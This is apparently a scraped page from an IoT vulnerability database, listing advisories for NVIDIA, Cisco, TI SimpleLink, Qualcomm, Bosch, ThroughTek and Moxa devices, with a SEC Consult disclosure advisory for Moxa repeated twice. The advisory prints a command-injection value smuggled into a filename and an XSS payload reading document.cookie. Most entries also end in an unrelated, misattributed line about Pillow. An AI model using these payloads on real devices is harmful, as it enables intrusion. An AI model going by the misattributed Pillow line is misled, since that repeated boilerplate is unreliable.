VARIoT IoT vulnerabilities database

NVIDIA camera firmware contains a difficult to exploit vulnerability where a highly privileged attacker can cause unauthorized modification to camera resources, which may result in complete denial of service and partial loss of data integrity for all clients. Jetson Linux Exists in a fraudulent authentication vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

NVIDIA Linux kernel distributions on Jetson Xavier contain a vulnerability in camera firmware where a user can change input data after validation, which may lead to complete denial of service and serious data corruption of all kernel components. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause an affected IP camera to reload. This vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected IP camera. A successful exploit could allow the attacker to cause the affected IP camera to reload unexpectedly, resulting in a denial of service (DoS) condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected product is vulnerable to an integer overflow while processing HTTP headers, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments Provided by the company SimpleLink The following multiple vulnerabilities exist in. * Integer overflow (CWE-190) - CVE-2021-22677 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-22673 ‥ * Integer overflow (CWE-190) - CVE-2021-22675 ‥ * Integer overflow (CWE-190) - CVE-2021-22671 ‥ * Integer overflow (CWE-190) - CVE-2021-22679The expected impact depends on each vulnerability, but it may be affected as follows. * Wi-Fi An integer overflow occurred during connection processing, and the service was stopped. (DoS) Or malicious code is executed - CVE-2021-22677 ‥ * CDN server Firmware from over-the-air Stack-based buffer overflow occurs when updating with, malicious code is executed by a remote third party - CVE-2021-22673 ‥ * Integer overflow occurs when loading a specially crafted firmware update file, causing malicious code to be executed by a remote third party - CVE-2021-22675 ‥ * HTTP Integer overflow occurs during header processing and malicious code is executed by a remote third party - CVE-2021-22679 ‥ * Integer overflow occurs when processing long domain names and malicious code is executed by a remote third party - CVE-2021-22671. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

An integer overflow exists in the APIs of the host MCU while trying to connect to a WIFI network may lead to issues such as a denial-of-service condition or code execution on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments Provided by the company SimpleLink The following multiple vulnerabilities exist in. * Integer overflow (CWE-190) - CVE-2021-22677 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-22673 ‥ * Integer overflow (CWE-190) - CVE-2021-22675 ‥ * Integer overflow (CWE-190) - CVE-2021-22671 ‥ * Integer overflow (CWE-190) - CVE-2021-22679The expected impact depends on each vulnerability, but it may be affected as follows. * Wi-Fi An integer overflow occurred during connection processing, and the service was stopped. (DoS) Or malicious code is executed - CVE-2021-22677 ‥ * CDN server Firmware from over-the-air Stack-based buffer overflow occurs when updating with, malicious code is executed by a remote third party - CVE-2021-22673 ‥ * Integer overflow occurs when loading a specially crafted firmware update file, causing malicious code to be executed by a remote third party - CVE-2021-22675 ‥ * HTTP Integer overflow occurs during header processing and malicious code is executed by a remote third party - CVE-2021-22679 ‥ * Integer overflow occurs when processing long domain names and malicious code is executed by a remote third party - CVE-2021-22671. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected product is vulnerable to integer overflow while parsing malformed over-the-air firmware update files, which may allow an attacker to remotely execute code on SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments Provided by the company SimpleLink The following multiple vulnerabilities exist in. * Integer overflow (CWE-190) - CVE-2021-22677 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-22673 ‥ * Integer overflow (CWE-190) - CVE-2021-22675 ‥ * Integer overflow (CWE-190) - CVE-2021-22671 ‥ * Integer overflow (CWE-190) - CVE-2021-22679The expected impact depends on each vulnerability, but it may be affected as follows. * Wi-Fi An integer overflow occurred during connection processing, and the service was stopped. (DoS) Or malicious code is executed - CVE-2021-22677 ‥ * CDN server Firmware from over-the-air Stack-based buffer overflow occurs when updating with, malicious code is executed by a remote third party - CVE-2021-22673 ‥ * Integer overflow occurs when loading a specially crafted firmware update file, causing malicious code to be executed by a remote third party - CVE-2021-22675 ‥ * HTTP Integer overflow occurs during header processing and malicious code is executed by a remote third party - CVE-2021-22679 ‥ * Integer overflow occurs when processing long domain names and malicious code is executed by a remote third party - CVE-2021-22671. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected product is vulnerable to stack-based buffer overflow while processing over-the-air firmware updates from the CDN server, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments Provided by the company SimpleLink The following multiple vulnerabilities exist in. * Integer overflow (CWE-190) - CVE-2021-22677 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-22673 ‥ * Integer overflow (CWE-190) - CVE-2021-22675 ‥ * Integer overflow (CWE-190) - CVE-2021-22671 ‥ * Integer overflow (CWE-190) - CVE-2021-22679The expected impact depends on each vulnerability, but it may be affected as follows. * Wi-Fi An integer overflow occurred during connection processing, and the service was stopped. (DoS) Or malicious code is executed - CVE-2021-22677 ‥ * CDN server Firmware from over-the-air Stack-based buffer overflow occurs when updating with, malicious code is executed by a remote third party - CVE-2021-22673 ‥ * Integer overflow occurs when loading a specially crafted firmware update file, causing malicious code to be executed by a remote third party - CVE-2021-22675 ‥ * HTTP Integer overflow occurs during header processing and malicious code is executed by a remote third party - CVE-2021-22679 ‥ * Integer overflow occurs when processing long domain names and malicious code is executed by a remote third party - CVE-2021-22671. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Multiple integer overflow issues exist while processing long domain names, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments Provided by the company SimpleLink The following multiple vulnerabilities exist in. * Integer overflow (CWE-190) - CVE-2021-22677 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-22673 ‥ * Integer overflow (CWE-190) - CVE-2021-22675 ‥ * Integer overflow (CWE-190) - CVE-2021-22671 ‥ * Integer overflow (CWE-190) - CVE-2021-22679The expected impact depends on each vulnerability, but it may be affected as follows. * Wi-Fi An integer overflow occurred during connection processing, and the service was stopped. (DoS) Or malicious code is executed - CVE-2021-22677 ‥ * CDN server Firmware from over-the-air Stack-based buffer overflow occurs when updating with, malicious code is executed by a remote third party - CVE-2021-22673 ‥ * Integer overflow occurs when loading a specially crafted firmware update file, causing malicious code to be executed by a remote third party - CVE-2021-22675 ‥ * HTTP Integer overflow occurs during header processing and malicious code is executed by a remote third party - CVE-2021-22679 ‥ * Integer overflow occurs when processing long domain names and malicious code is executed by a remote third party - CVE-2021-22671. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Use after free in camera If the threadmanager is being cleaned up while the worker thread is processing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile. plural Qualcomm The product contains a vulnerability related to the use of freed memory.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Mesh Provisioning in the Bluetooth Mesh profile 1.0 and 1.0.1 may permit a nearby device (without possession of the AuthValue used in the provisioning protocol) to determine the AuthValue via a brute-force attack (unless the AuthValue is sufficiently random and changed each time). Devices supporting the Bluetooth Core and Mesh Specifications are vulnerable to impersonation attacks and AuthValue disclosure that could allow an attacker to impersonate a legitimate device during pairing.CVE- 2020-26556 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26555 Affected Vendor Statement: Android has assessed this issue as High severity for Android OS and will be issuing a patch for this vulnerability in an upcoming Android security bulletin. CVE-2020-26557 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26558 Affected Vendor Statement: Android has reviewed this report and assessed this vulnerability as having impact on Android OS. We will be issuing a patch for this vulnerability in an upcoming Android security bulletin. CVE-2020-26559 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26560 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. VU#799380.5 Affected Vendor Statement: Our assessment of this report is that it is of negligible security impact on Android.CVE- 2020-26556 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26555 Affected Vendor Statement: Android has assessed this issue as High severity for Android OS and will be issuing a patch for this vulnerability in an upcoming Android security bulletin. CVE-2020-26557 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26558 Affected Vendor Statement: Android has reviewed this report and assessed this vulnerability as having impact on Android OS. We will be issuing a patch for this vulnerability in an upcoming Android security bulletin. CVE-2020-26559 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. CVE-2020-26560 Not Affected Vendor Statement: Android does not support Bluetooth Mesh so is not vulnerable. VU#799380.5 Affected Vendor Statement: Our assessment of this report is that it is of negligible security impact on Android. Bluetooth Mesh profile Contains an improper authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A Missing Authentication in Critical Function in Bosch IP cameras allows an unauthenticated remote attacker to extract sensitive information or change settings of the camera by sending crafted requests to the device. Only devices of the CPP6, CPP7 and CPP7.3 family with firmware 7.70, 7.72, and 7.80 prior to B128 are affected by this vulnerability. Versions 7.62 or lower and INTEOX cameras are not affected. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Use after free can occur due to improper handling of response from firmware in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. plural Qualcomm The product contains a vulnerability related to the use of freed memory.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected ThroughTek P2P products (SDKs using versions before 3.1.5, any versions with nossl tag, device firmware not using AuthKey for IOTC conneciton, firmware using AVAPI module without enabling DTLS mechanism, and firmware using P2PTunnel or RDT module) do not sufficiently protect data transferred between the local device and ThroughTek servers. This can allow an attacker to access sensitive information, such as camera feeds. ThroughTek Provided by the company P2P Software Development Kit (SDK) contains a vulnerability in which sensitive information may be transmitted in plain text. P2P Software Development Kit (SDK) provides the ability to access audio and video streams over the Internet. ThroughTek This is a development kit manufactured by the company. SDK The company said that data transferred between the device and its servers is not adequately protected, and that sensitive information is transmitted in plain text. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Certain MOXA devices allow Authenticated Command Injection via /forms/web_importTFTP. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3. plural MOXA On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. SEC Consult Vulnerability Lab Security Advisory < 20210901-0 > ======================================================================= title: Multiple vulnerabilities product: see "Vulnerable / tested versions" vulnerable version: see "Vulnerable / tested versions" fixed version: see "Solution" CVE number: CVE-2021-39278, CVE-2021-39279 impact: High homepage: https://www.moxa.com/ found: 2020-08-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Together, We Create Change Moxa is committed to making a positive impact around the world. We put our all behind this commitment--from our employees, to our products and supply chain. In our local communities, we nurture and support the spirit of volunteering. We encourage our employees to contribute to community development, with an emphasis on ecology, education, and health. In our products, we invest in social awareness programs and environment-friendly policies at every stage of the product lifecycle. We make sure our manufacturing meets the highest standards with regards to quality, ethics, and sustainability." Source: https://www.moxa.com/en/about-us/corporate-responsibility Business recommendation: ------------------------ SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. An attacker can abuse this vulnerability to compromise the operating system of the device. This issue was found by emulating the firmware of the device. 2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278) Via a crafted config-file, a reflected cross-site scripting vulnerability can be exploited in the context of the victim's browser. This config-file can be uploaded to the device via the "Config Import Export" tab in the main menu. 3) Known GNU glibc Vulnerabilities (CVE-2015-0235) The used GNU glibc in version 2.9 is outdated and contains multiple known vulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235, gethostbyname "GHOST" buffer overflow) was verified by using the MEDUSA scalable firmware runtime. 4) Multiple Outdated Software Components Multiple outdated software components containing vulnerabilities were found by the IoT Inspector. The vulnerabilities 1), 2) and 3) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime. Proof of concept: ----------------- 1) Authenticated Command Injection (CVE-2021-39279) The vulnerability can be triggered by navigating in the web interface to the tab: "Main Menu"->"Maintenance"->"Config Import Export" The "TFTP Import" menu is prone to command injection via all parameters. To exploit the vulnerability, an IP address, a configuration path and a filename must be set. If the filename is used to trigger the exploit, the payload in the interceptor proxy would be: http://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100` 2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278) The vulnerability can be triggered by navigating in the web interface to the tab: "Main Menu"->"Maintenance"->"Config Import Export" The "Config Import" menu is prone to reflected cross-site scripting via the upload of config files. Example of malicious config file: ------------------------------------------------------------------------------- [board] deviceName="WAC-2004_0000</span><script>alert(document.cookie)</script>" deviceLocation="" [..] ------------------------------------------------------------------------------- Uploading such a crafted file triggers cross-site scripting as the erroneous value is displayed without filtering characters. 3) Known GNU glibc Vulnerabilities (CVE-2015-0235) GNU glibc version 2.9 contains multiple CVEs like: CVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more. The gethostbyname buffer overflow vulnerability (GHOST) was checked with the help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled and executed on the emulated device to test the system. 4) Multiple Outdated Software Components The IoT Inspector recognized multiple outdated software components with known vulnerabilities: BusyBox 1.18.5 06/2011 Dropbear SSH 2011.54 11/2011 GNU glibc 2.9 02/2009 Linux Kernel 2.6.27 10/2008 OpenSSL 0.9.7g 04/2005 Only found in the program "iw_director" OpenSSL 1.0.0 03/2010 Vulnerable / tested versions: ----------------------------- The following firmware versions for various devices have been identified to be vulnerable: * WAC-2004 / 1.7 * WAC-1001 / 2.1 * WAC-1001-T / 2.1 * OnCell G3470A-LTE-EU / 1.7 * OnCell G3470A-LTE-EU-T / 1.7 * TAP-323-EU-CT-T / 1.3 * TAP-323-US-CT-T / 1.3 * TAP-323-JP-CT-T / 1.3 * WDR-3124A-EU / 2.3 * WDR-3124A-EU-T / 2.3 * WDR-3124A-US / 2.3 * WDR-3124A-US-T / 2.3 Vendor contact timeline: ------------------------ 2020-10-09: Contacting vendor through moxa.csrt@moxa.com. 2020-10-12: Contact sends PGP key for encrypted communication and asks for the detailed advisory. Sent encrypted advisory to vendor. 2020-11-06: Status update from vendor regarding technical analysis. Vendor requested more time for fixing the vulnerabilities as more products are affected. 2020-11-09: Granted more time for fixing to vendor. 2020-11-10: Vendor asked for next steps regarding the advisory publication. 2020-11-11: Asked vendor for an estimation when a public disclosure is possible. 2020-11-16: Vendor responded that the product team can give a rough feedback. 2020-11-25: Asked for a status update. 2020-11-25: Vendor responded that the investigation is not done yet. 2020-12-14: Vendor provided a list of potential affected devices and stated that full investigation may take until January 2021 due to the list of CVEs that were provided with the appended IoT Inspector report. The patches may be available until June 2021. 2020-12-15: Shifted next status update round with vendor on May 2021. 2020-12-23: Vendor provided full list of affected devices. 2021-02-05: Vendor sieved out the found issues from 4) manually and provided a full list of confirmed vulnerabilities. WAC-2004 phased-out in 2019. 2021-02-21: Confirmed receive of vulnerabilities, next status update in May 2021. 2021-06-10: Asking for an update. 2021-06-15: Vendor stated, that the update will be provided in the next days. 2021-06-21: Vendor will give an update in the next week as Covid gets worse in Taiwan. 2021-06-23: Vendor stated, that patches are under development. Vendor needs more time to finish the patches. 2021-06-24: Set release date to 2021-09-01. 2021-07-02: Vendor provides status updates. 2021-08-16: Vendor provides status updates. 2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out. 2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers. 2021-08-31: Vendor provides fixed firmware version numbers and the advisory links. 2021-09-01: Coordinated release of security advisory. Solution: --------- According to the vendor the following patches must be applied to fix issues: * WAC-1001 / 2.1.5 * WAC-1001-T / 2.1.5 * OnCell G3470A-LTE-EU / 1.7.4 * OnCell G3470A-LTE-EU-T / 1.7.4 * TAP-323-EU-CT-T / 1.8.1 * TAP-323-US-CT-T / 1.8.1 * TAP-323-JP-CT-T / 1.8.1 The Moxa Technical Support must be contacted for requesting the security patches. The corresponding security advisories for the affected devices are available on the vendor's website: TAP-323/WAC-1001/WAC-2004 https://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities OnCell G3470A-LTE/WDR-3124A https://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities The following device models are EOL and should be replaced: * WAC-2004 * WDR-3124A-EU * WDR-3124A-EU-T * WDR-3124A-US * WDR-3124A-US-T Workaround: ----------- None. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thomas Weber / @2021

Certain MOXA devices allow reflected XSS via the Config Import menu. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3. plural MOXA A cross-site scripting vulnerability exists in the device.Information may be obtained and information may be tampered with. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Many Moxa devices suffer from command injection, cross site scripting, and outdated software vulnerabilities. SEC Consult Vulnerability Lab Security Advisory < 20210901-0 > ======================================================================= title: Multiple vulnerabilities product: see "Vulnerable / tested versions" vulnerable version: see "Vulnerable / tested versions" fixed version: see "Solution" CVE number: CVE-2021-39278, CVE-2021-39279 impact: High homepage: https://www.moxa.com/ found: 2020-08-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Together, We Create Change Moxa is committed to making a positive impact around the world. We put our all behind this commitment--from our employees, to our products and supply chain. In our local communities, we nurture and support the spirit of volunteering. We encourage our employees to contribute to community development, with an emphasis on ecology, education, and health. In our products, we invest in social awareness programs and environment-friendly policies at every stage of the product lifecycle. We make sure our manufacturing meets the highest standards with regards to quality, ethics, and sustainability." Source: https://www.moxa.com/en/about-us/corporate-responsibility Business recommendation: ------------------------ SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: ----------------------------------- 1) Authenticated Command Injection (CVE-2021-39279) An authenticated command injection vulnerability can be triggered by issuing a GET request to the "/forms/web_importTFTP" CGI program which is available on the web interface. An attacker can abuse this vulnerability to compromise the operating system of the device. This issue was found by emulating the firmware of the device. 3) Known GNU glibc Vulnerabilities (CVE-2015-0235) The used GNU glibc in version 2.9 is outdated and contains multiple known vulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235, gethostbyname "GHOST" buffer overflow) was verified by using the MEDUSA scalable firmware runtime. 4) Multiple Outdated Software Components Multiple outdated software components containing vulnerabilities were found by the IoT Inspector. The vulnerabilities 1), 2) and 3) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime. Proof of concept: ----------------- 1) Authenticated Command Injection (CVE-2021-39279) The vulnerability can be triggered by navigating in the web interface to the tab: "Main Menu"->"Maintenance"->"Config Import Export" The "TFTP Import" menu is prone to command injection via all parameters. To exploit the vulnerability, an IP address, a configuration path and a filename must be set. If the filename is used to trigger the exploit, the payload in the interceptor proxy would be: http://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100` 2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278) The vulnerability can be triggered by navigating in the web interface to the tab: "Main Menu"->"Maintenance"->"Config Import Export" The "Config Import" menu is prone to reflected cross-site scripting via the upload of config files. Example of malicious config file: ------------------------------------------------------------------------------- [board] deviceName="WAC-2004_0000</span><script>alert(document.cookie)</script>" deviceLocation="" [..] ------------------------------------------------------------------------------- Uploading such a crafted file triggers cross-site scripting as the erroneous value is displayed without filtering characters. 3) Known GNU glibc Vulnerabilities (CVE-2015-0235) GNU glibc version 2.9 contains multiple CVEs like: CVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more. The gethostbyname buffer overflow vulnerability (GHOST) was checked with the help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled and executed on the emulated device to test the system. 4) Multiple Outdated Software Components The IoT Inspector recognized multiple outdated software components with known vulnerabilities: BusyBox 1.18.5 06/2011 Dropbear SSH 2011.54 11/2011 GNU glibc 2.9 02/2009 Linux Kernel 2.6.27 10/2008 OpenSSL 0.9.7g 04/2005 Only found in the program "iw_director" OpenSSL 1.0.0 03/2010 Vulnerable / tested versions: ----------------------------- The following firmware versions for various devices have been identified to be vulnerable: * WAC-2004 / 1.7 * WAC-1001 / 2.1 * WAC-1001-T / 2.1 * OnCell G3470A-LTE-EU / 1.7 * OnCell G3470A-LTE-EU-T / 1.7 * TAP-323-EU-CT-T / 1.3 * TAP-323-US-CT-T / 1.3 * TAP-323-JP-CT-T / 1.3 * WDR-3124A-EU / 2.3 * WDR-3124A-EU-T / 2.3 * WDR-3124A-US / 2.3 * WDR-3124A-US-T / 2.3 Vendor contact timeline: ------------------------ 2020-10-09: Contacting vendor through moxa.csrt@moxa.com. 2020-10-12: Contact sends PGP key for encrypted communication and asks for the detailed advisory. Sent encrypted advisory to vendor. 2020-11-06: Status update from vendor regarding technical analysis. Vendor requested more time for fixing the vulnerabilities as more products are affected. 2020-11-09: Granted more time for fixing to vendor. 2020-11-10: Vendor asked for next steps regarding the advisory publication. 2020-11-11: Asked vendor for an estimation when a public disclosure is possible. 2020-11-16: Vendor responded that the product team can give a rough feedback. 2020-11-25: Asked for a status update. 2020-11-25: Vendor responded that the investigation is not done yet. 2020-12-14: Vendor provided a list of potential affected devices and stated that full investigation may take until January 2021 due to the list of CVEs that were provided with the appended IoT Inspector report. The patches may be available until June 2021. 2020-12-15: Shifted next status update round with vendor on May 2021. 2020-12-23: Vendor provided full list of affected devices. 2021-02-05: Vendor sieved out the found issues from 4) manually and provided a full list of confirmed vulnerabilities. WAC-2004 phased-out in 2019. 2021-02-21: Confirmed receive of vulnerabilities, next status update in May 2021. 2021-06-10: Asking for an update. 2021-06-15: Vendor stated, that the update will be provided in the next days. 2021-06-21: Vendor will give an update in the next week as Covid gets worse in Taiwan. 2021-06-23: Vendor stated, that patches are under development. Vendor needs more time to finish the patches. 2021-06-24: Set release date to 2021-09-01. 2021-07-02: Vendor provides status updates. 2021-08-16: Vendor provides status updates. 2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out. 2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers. 2021-08-31: Vendor provides fixed firmware version numbers and the advisory links. 2021-09-01: Coordinated release of security advisory. Solution: --------- According to the vendor the following patches must be applied to fix issues: * WAC-1001 / 2.1.5 * WAC-1001-T / 2.1.5 * OnCell G3470A-LTE-EU / 1.7.4 * OnCell G3470A-LTE-EU-T / 1.7.4 * TAP-323-EU-CT-T / 1.8.1 * TAP-323-US-CT-T / 1.8.1 * TAP-323-JP-CT-T / 1.8.1 The Moxa Technical Support must be contacted for requesting the security patches. The corresponding security advisories for the affected devices are available on the vendor's website: TAP-323/WAC-1001/WAC-2004 https://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities OnCell G3470A-LTE/WDR-3124A https://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities The following device models are EOL and should be replaced: * WAC-2004 * WDR-3124A-EU * WDR-3124A-EU-T * WDR-3124A-US * WDR-3124A-US-T Workaround: ----------- None. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thomas Weber / @2021

